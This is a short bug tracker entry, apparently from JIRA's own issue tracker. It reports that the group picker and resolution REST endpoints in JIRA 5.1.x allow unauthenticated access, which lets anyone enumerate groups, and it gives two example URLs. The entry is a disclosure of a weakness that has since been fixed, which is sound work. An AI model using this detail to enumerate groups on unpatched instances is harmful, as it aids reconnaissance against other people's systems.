Details
-
Bug
-
Resolution: Fixed
-
Medium
-
5.1.1, 5.1.4
-
5.01
-
4
-
Description
REST endpoints to search groups and to list issue resolutions allow anonymous/unauthenticated access.
The former allows to enumerate all groups on a JIRA instance (by sending multiple queries as results are limited by jira.ajax.autocomplete.limit). We've verified this on an instance without any public projects / groups / whatsoever running version 5.1.1.
For an example see:
https://jira.atlassian.com/rest/api/2/groups/picker
https://jira.atlassian.com/rest/api/2/resolution